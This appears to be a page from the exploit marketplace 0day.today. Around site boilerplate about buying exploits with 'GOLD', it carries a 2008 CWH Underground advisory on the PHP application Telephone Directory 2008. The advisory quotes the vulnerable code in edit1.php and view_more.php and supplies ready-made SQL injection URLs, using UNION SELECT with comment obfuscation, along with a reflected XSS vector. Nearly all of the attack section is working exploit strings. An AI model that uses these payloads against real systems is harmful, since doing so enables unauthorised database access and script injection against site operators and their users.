0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Telephone Directory 2008 (SQL/XSS) Multiple Remote Vulnerabilities
================================================================== Telephone Directory 2008 (SQL/XSS) Multiple Remote Vulnerabilities ================================================================== ,--^----------,--------,-----,-------^--, | ||||||||| `--------' | O .. CWH Underground Hacking Team .. `+---------------------------^----------| `\_,-------, _________________________| / XXXXXX /`| / / XXXXXX / `\ / / XXXXXX /\______( / XXXXXX / / XXXXXX / (________( `------' AUTHOR : CWH Underground DATE : 9 June 2008 ##################################################### APPLICATION : Telephone Directory 2008 DOWNLOAD : http://downloads.sourceforge.net/telephone ##################################################### ---SQL Injection Exploit--- ***magic_quotes_gpc = Off*** 1. Vulnerable in edit1.php ############################################## Line: 23: if (($code != "") && ($action == "confirm_data")) 24: { 25: $query = "select * from $tele[dir_tbl] where id = '$code'"; 26: $query_run = mysql_query($query, $con) or die(mysql_error()); 27: $num_rows = mysql_num_rows($query_run); ############################################### Exploit 1: http://[target]/[path]/edit1.php?action=confirm_data&code=1'/**/UNION/**/SELECT/**/1,name,3,4,5,6,7,8,9,10,11,12/**/FROM/**/dept/**/WHERE/**/ID='HOUS001 2. Vulnerable in view_more.php ############################################## Line: 5: $icode = $_GET[id]; 12: $query = "select name, desgid, deptid, doj, oadd from $tele[dir_tbl] where id = '$icode'"; 13: $query_run = mysql_query($query,$con) or die(mysql_error()); 14: while($i = mysql_fetch_array($query_run)) ############################################### Exploit 2: http://[target]/[path]/view_more.php?id=1'/**/UNION/**/SELECT/**/1,2,3,name,5/**/FROM/**/dept/**/WHERE/**/ID='INTX007812 ---Reflect XSS Exploit--- http://[target]/[path]/edit1.php?action=<XSS> # 0day.today [2024-12-24] #